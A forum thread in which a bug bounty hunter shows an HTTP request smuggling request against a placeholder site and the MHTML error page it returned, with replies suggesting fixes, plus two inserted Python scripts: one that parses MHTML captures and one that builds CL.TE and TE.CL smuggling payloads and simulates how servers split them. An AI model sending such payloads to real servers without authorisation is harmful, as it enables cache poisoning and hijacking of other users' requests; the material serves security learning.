HTTP Request Smuggling Question

After reading up a little bit on HTTP Request Smuggling, I decided to try it for a bug bounty site I was working on. I found some weird behavior that I’ve never seen before. The response from my smuggle is an RFC 822 message. It looks like I can poison the /ForgotPassword.aspx endpoint by putting a random parameter. Example: /ForgotPassword.aspx?notreal=123456. Anyone that visits that endpoint will just have a .eml file download, which is the RFC 822 message I was mentioning. It’s just a random message from November 2015. In the message, unfortunately, there is nothing sensitive. There are a few .js files, but I already found those beforehand and there’s nothing there. Is there a way that I can manipulate this further? It seems that anything I try, either the server times out or it just consistently presents me with that RFC 822 message. Here is an example of the request and RFC 822 response:


Request:

POST /ForgotPassword.aspx?notreal=123456 HTTP/1.1
 Transfer-Encoding: chunked
Host: sumwebsite.com
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Cache-Control: max-age=0
Referer: https://sumwebsite.com/ForgotPassword.aspx
Content-Type: application/x-www-form-urlencoded
Cookie: sumcookie=sumvalue
Content-Length: 721
Connection: keep-alive

283
dy5t1=x&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%sumvalue&__VIEWSTATEGENERATOR=sumvalue&__EVENTVALIDATION=sumvalue&txtEmail=a@b.com&btnReturnLogin=Return+to+Login

GET /randomstring HTTP/1.1
X-Ignore: X

Response (RFC 822 message):

HTTP/1.1 200 OK
Content-Type: message/rfc822
Last-Modified: Tue, 03 Nov 2015 23:38:21 GMT
Accept-Ranges: bytes
ETag: "4d881b99016d11:0"
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
X-Frame-Options: SAMEORIGIN
Date: Fri, 10 Jan 2020 03:17:04 GMT
Content-Length: 8875

From: "Saved by Internet Explorer 11"
Subject: Login
Date: Tue, 3 Nov 2015 17:38:21 -0600
MIME-Version: 1.0
Content-Type: multipart/related;
type="text/html";
boundary="----=_NextPart_000_0000_01D1165E.6EE6C750"
X-MimeOLE: Produced By Microsoft MimeOLE V6.1.7601.17609

This is a multi-part message in MIME format.

------=_NextPart_000_0000_01D1165E.6EE6C750
Content-Type: text/html;
charset="utf-8"
Content-Transfer-Encoding: quoted-printable
Content-Location: http://localhost:1626/Error.aspx

=EF=BB=BF<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" =
""><HTML><HEAD><META=20
content=3D"IE=3D5.0000" http-equiv=3D"X-UA-Compatible">
<TITLE>Login</TITLE> =20
<META http-equiv=3D"Content-Type" content=3D"text/html; =
charset=3Dutf-8">
<META name=3D"GENERATOR" content=3D"MSHTML 11.00.9600.18015"> =20
<META name=3D"CODE_LANGUAGE" content=3D"C#"> =20
<META name=3D"vs_defaultClientScript" content=3D"JavaScript"> =20
<META name=3D"vs_targetSchema" =
content=3D"http://schemas.microsoft.com/intellisense/ie5">
<LINK id=3D"linkStyle" href=3D"http://localhost:1626/StyleSheet.css" =
rel=3D"stylesheet"=20
type=3D"text/css"> =20
<SCRIPT language=3D"javascript" =
src=3D"http://localhost:1626/JavaScriptFunctions.js" =
type=3D"text/javascript"></SCRIPT>
</HEAD>=20
<BODY>
<TABLE width=3D"775" border=3D"0" cellspacing=3D"0" cellpadding=3D"0">
  <TBODY>
  <TR>
    <TD>&nbsp;</TD>
    <TD valign=3D"top"><IMG name=3D"Image55" width=3D"283" height=3D"68" =
src=3D"http://localhost:1626/Images/logo_un.gif"></TD></TR></TBODY></TABL=
E>
<P>        Ooops!!! Please contact your administrator.</P></BODY></HTML>

------=_NextPart_000_0000_01D1165E.6EE6C750
Content-Type: image/gif
Content-Transfer-Encoding: base64
Content-Location: http://localhost:1626/Images/logo_un.gif

[base64-encoded GIF body omitted]

------=_NextPart_000_0000_01D1165E.6EE6C750
Content-Type: text/css;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Content-Location: http://localhost:1626/StyleSheet.css

body {
=09
}
.menuLink {
color: rgb(0, 0, 0); font-family: Arial; font-size: 10pt;
}
.menuLink:active {
color: rgb(0, 0, 0); font-family: Arial; font-size: 10pt;
}
.menuLink:visited {
color: rgb(0, 0, 0); font-family: Arial; font-size: 10pt;
}
.menuLink:hover {
color: navy; font-family: Arial; font-size: 10pt;
}
.standardLink {
color: blue; font-family: Arial; font-size: 10pt;
}
.standardLink:active {
color: blue; font-family: Arial; font-size: 10pt;
}
.standardLink:visited {
color: blue; font-family: Arial; font-size: 10pt;
}
.standardLink:hover {
color: navy; font-family: Arial; font-size: 10pt;
}
h2 {
color: rgb(0, 0, 0); font-family: Arial; font-size: 18pt;
}
h3 {
color: rgb(0, 0, 0); font-family: Arial; font-size: 12pt;
}
td {
color: rgb(0, 0, 0); font-family: Arial; font-size: 10pt; margin-left: =
40px;
}
.HeaderText {
color: rgb(0, 0, 0); font-family: Arial; font-size: 12pt; font-weight: =
bold; background-color: rgb(200, 200, 200);
}
.HeaderTextSmall {
color: rgb(0, 0, 0); font-family: Arial; font-size: 11pt; font-weight: =
bold;
}
.MenuHeaderText {
color: rgb(0, 0, 0); font-family: Arial; font-size: 12pt; font-weight: =
bold;
}
.LoginHeaderText {
color: rgb(0, 0, 0); font-family: Arial; font-size: 12pt; font-weight: =
bold;
}
.LoginText {
color: rgb(0, 0, 0); font-family: Arial; font-size: 12pt; font-weight: =
bold;
}

------=_NextPart_000_0000_01D1165E.6EE6C750
Content-Type: application/octet-stream
Content-Transfer-Encoding: 7bit
Content-Location: http://localhost:1626/JavaScriptFunctions.js

function SaveScroll()
{
document.all('txtXPos').value = window.document.body.scrollLeft;
document.all('txtYPos').value = window.document.body.scrollTop;
return;
}


function SetJSFocus()
{
var XPos = document.all('txtXPos').value;
var YPos = document.all('txtYPos').value;
window.document.body.scrollLeft = XPos;
window.document.body.scrollTop = YPos;
}

function DisableEnter()
{
//alert('Key hit');
if (window.event.keyCode == 13)
{
event.returnValue=false;
event.cancel = true;
//alert('Enter hit');
}
}

function CheckPhoneForSameNumber(oSrc, args)
{
args.IsValid = (args.Value != '111-111-1111' &&
args.Value != '222-222-2222' &&
args.Value != '333-333-3333' &&
args.Value != '444-444-4444' &&
args.Value != '555-555-5555' &&
args.Value != '666-666-6666' &&
args.Value != '777-777-7777' &&
args.Value != '888-888-8888' &&
args.Value != '999-999-9999' &&
args.Value != '000-000-0000');
}


------=_NextPart_000_0000_01D1165E.6EE6C750--
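
As an added example (not code from the post): the response above is an MHTML capture, a web page saved by Internet Explorer as a multipart/related RFC 822 message. The script below uses Python's standard email module to split such a file into its parts, undo their transfer encodings and report what the capture gives away even when the pages themselves look harmless: the tool and date it was saved with, the origin it was captured from (in the post, a developer's http://localhost:1626) and every URL the saved markup references. The embedded message is a trimmed copy of the one in the post, constructed here so the script runs offline; the GIF is replaced by a 1x1 placeholder.

```python
import email
import re
from urllib.parse import urlparse

# Constructed sample: a shortened copy of the message/rfc822 body from the post
# (same boundary, top-level headers and Content-Location values; part bodies cut
# down, GIF replaced by a 1x1 placeholder). Continuation lines are tab-indented
# as in a real MHTML file.
SAMPLE_EML = b"""From: "Saved by Internet Explorer 11"
Subject: Login
Date: Tue, 3 Nov 2015 17:38:21 -0600
MIME-Version: 1.0
Content-Type: multipart/related;
\ttype="text/html";
\tboundary="----=_NextPart_000_0000_01D1165E.6EE6C750"
X-MimeOLE: Produced By Microsoft MimeOLE V6.1.7601.17609

This is a multi-part message in MIME format.

------=_NextPart_000_0000_01D1165E.6EE6C750
Content-Type: text/html;
\tcharset="utf-8"
Content-Transfer-Encoding: quoted-printable
Content-Location: http://localhost:1626/Error.aspx

=EF=BB=BF<HTML><HEAD><TITLE>Login</TITLE>
<LINK href=3D"http://localhost:1626/StyleSheet.css" rel=3D"stylesheet">
<SCRIPT src=3D"http://localhost:1626/JavaScriptFunctions.js"></SCRIPT>
</HEAD><BODY><P>Ooops!!! Please contact your administrator.</P></BODY></HTML>

------=_NextPart_000_0000_01D1165E.6EE6C750
Content-Type: image/gif
Content-Transfer-Encoding: base64
Content-Location: http://localhost:1626/Images/logo_un.gif

R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7

------=_NextPart_000_0000_01D1165E.6EE6C750
Content-Type: application/octet-stream
Content-Transfer-Encoding: 7bit
Content-Location: http://localhost:1626/JavaScriptFunctions.js

function SaveScroll() { return; }

------=_NextPart_000_0000_01D1165E.6EE6C750--
"""

URL_RE = re.compile(rb"https?://[^\s\"'<>)]+")


def extract_parts(raw):
    """Leaf MIME parts of an MHTML / RFC 822 message, with transfer encodings undone."""
    msg = email.message_from_bytes(raw)
    parts = []
    for part in msg.walk():
        if part.is_multipart():
            continue                      # the multipart/related container itself
        parts.append({
            "content_location": (part.get("Content-Location") or "").strip(),
            "content_type": part.get_content_type(),
            "body": part.get_payload(decode=True) or b"",   # decodes QP / base64
        })
    return parts


def triage(raw):
    """What the capture leaks: saving tool and date, capture origin(s) taken from
    Content-Location, and every URL referenced inside the decoded part bodies."""
    msg = email.message_from_bytes(raw)
    parts = extract_parts(raw)
    origins, urls = set(), set()
    for p in parts:
        if p["content_location"]:
            origins.add(urlparse(p["content_location"]).netloc)
        for u in URL_RE.findall(p["body"]):
            urls.add(u.decode("ascii", "replace"))
    return {
        "saved_by": (msg.get("From") or "").strip().strip('"'),
        "saved_on": (msg.get("Date") or "").strip(),
        "capture_origins": sorted(origins),        # e.g. a developer's localhost:1626
        "referenced_urls": sorted(urls),
        "parts": [(p["content_type"], p["content_location"], len(p["body"])) for p in parts],
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_EML).items():
        print(f"{key}: {value}")
```

Point it at a downloaded .eml instead of SAMPLE_EML to list every embedded resource with its original URL; the Content-Location origin and the X-MimeOLE / "Saved by" headers tell you which machine and tool produced the file, which is often more useful than the saved page itself.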

I haven’t played with request smuggling, but I think that HTTP/1.1 expects a Host header. Maybe add the Host header to GET /randomstring or use HTTP/1.0 or HTTP/0.9.
Also, do not forget about the new lines \r\n\r\n at the bottom of a GET request.

My suggestions are based on the message from the response: "Ooops!!! Please contact your administrator."
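
To make the points in the answer concrete, the following added example (not the poster's or the answerer's code) builds the two textbook desync shapes with the chunk size and Content-Length computed from the payload, checks a smuggled request head for the issues named above (an HTTP/1.1 request line without a Host header, a head that does not end in CRLF), and simulates how a parser that honours only Content-Length and one that honours only Transfer-Encoding each split the same byte stream into requests. The host name, the paths and the trailing "victim" request are assumptions made up for the demonstration, and frame() is a deliberately minimal model of the two behaviours, not a full HTTP parser.

```python
# Added example, not from the post or the answer. Builds CL.TE and TE.CL request
# shapes with derived lengths, lints the smuggled head for the problems discussed
# (no Host on HTTP/1.1, missing CRLF), and simulates Content-Length-only versus
# chunked-only framing. Host, paths and the victim request are constructed.


def _post_head(host, path, content_length):
    """Outer POST head carrying both framing headers: the desync trigger."""
    return (
        f"POST {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {content_length}\r\n"
        "Transfer-Encoding: chunked\r\n"
        "\r\n"
    ).encode()


def lint_smuggled_head(head):
    """Problems that make the back-end reject the smuggled request or wait forever."""
    problems = []
    lines = head.split(b"\r\n")
    if b"\n" in head.replace(b"\r\n", b""):
        problems.append("bare LF line ending")
    if not head.endswith(b"\r\n"):
        problems.append("head does not end with CRLF")
    if lines[0].endswith(b"HTTP/1.1") and not any(
        line.lower().startswith(b"host:") for line in lines[1:]
    ):
        problems.append("HTTP/1.1 request without a Host header")
    return problems


def build_clte(host, path, smuggled_head):
    """CL.TE: front-end honours Content-Length and forwards one request; back-end
    honours Transfer-Encoding, reads an empty chunked body, then parses the
    smuggled request as the next request on the connection."""
    smuggled = smuggled_head + b"\r\n"          # blank line completes the smuggled head
    body = b"0\r\n\r\n" + smuggled
    return _post_head(host, path, len(body)) + body


def build_tecl(host, path, smuggled_head):
    """TE.CL: front-end honours Transfer-Encoding and forwards one chunk holding the
    smuggled request; back-end honours a Content-Length that covers only the
    chunk-size line, so the chunk contents become the next request."""
    tail = b"\r\n0\r\n\r\n"                     # end of chunk + terminating chunk
    # Give the smuggled request a Content-Length that swallows `tail`; otherwise
    # the back-end parses the chunk terminator as a garbage third request.
    smuggled = smuggled_head + f"Content-Length: {len(tail)}\r\n\r\n".encode()
    size_line = f"{len(smuggled):x}\r\n".encode()
    return _post_head(host, path, len(size_line)) + size_line + smuggled + tail


def _read_chunked(buf):
    """Decode a chunked body without trailers: (body, rest), or (None, buf) if incomplete."""
    body = b""
    while True:
        nl = buf.find(b"\r\n")
        if nl < 0:
            return None, buf
        size = int(buf[:nl].split(b";")[0], 16)  # ValueError on a non-hex size line
        buf = buf[nl + 2:]
        if size == 0:
            return (body, buf[2:]) if buf.startswith(b"\r\n") else (None, buf)
        if len(buf) < size + 2:
            return None, buf
        body += buf[:size]
        buf = buf[size + 2:]


def frame(stream, mode):
    """Split `stream` into (request_line, body) units as a parser honouring only
    Content-Length (mode="cl") or Transfer-Encoding (mode="te") would, and return
    the bytes it could not consume, i.e. what it would sit waiting on."""
    units = []
    while stream:
        end = stream.find(b"\r\n\r\n")
        if end < 0:
            break                                # incomplete head: parser blocks
        lines, rest = stream[:end].split(b"\r\n"), stream[end + 4:]
        hdrs = {}
        for line in lines[1:]:
            name, _, value = line.partition(b":")
            hdrs[name.strip().lower()] = value.strip()
        if mode == "te" and hdrs.get(b"transfer-encoding", b"").lower() == b"chunked":
            body, rest = _read_chunked(rest)
            if body is None:
                break                            # chunked body never terminated
        else:
            n = int(hdrs.get(b"content-length", b"0"))
            if len(rest) < n:
                break
            body, rest = rest[:n], rest[n:]
        units.append((lines[0], body))
        stream = rest
    return units, stream


HOST = "sumwebsite.com"                          # placeholder name from the post
SMUGGLED_HEAD = (b"GET /randomstring HTTP/1.1\r\n"
                 b"Host: sumwebsite.com\r\n"     # Host present, as the answer suggests
                 b"X-Ignore: X\r\n")
VICTIM = b"GET /ForgotPassword.aspx HTTP/1.1\r\nHost: sumwebsite.com\r\n\r\n"  # constructed


def demo():
    """Request lines each parser sees for each shape, with the victim request appended."""
    out = {}
    for name, build in (("CL.TE", build_clte), ("TE.CL", build_tecl)):
        stream = build(HOST, "/ForgotPassword.aspx", SMUGGLED_HEAD) + VICTIM
        out[name] = {mode: [u[0] for u in frame(stream, mode)[0]] for mode in ("cl", "te")}
    return out


if __name__ == "__main__":
    for shape, views in demo().items():
        print(shape, views)
    print(lint_smuggled_head(b"GET /randomstring HTTP/1.1\r\nX-Ignore: X"))
```

Running it shows the asymmetry that makes smuggling work: with CL.TE the Content-Length side sees two requests while the chunked side sees three (the extra one being GET /randomstring), and with TE.CL it is the other way round. A chunked body that never reaches its terminating 0 chunk leaves the parser holding the bytes and waiting for more, which from the client side looks like a timeout; the lint function catches the two head problems the answer points at before a request is ever sent.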

Hello @stefanofinding, thank you for the response! Very much appreciated, good sir. I tested a couple other things and I couldn’t get anything out of it, so I decided to pack my bags and move on. Thanks again!
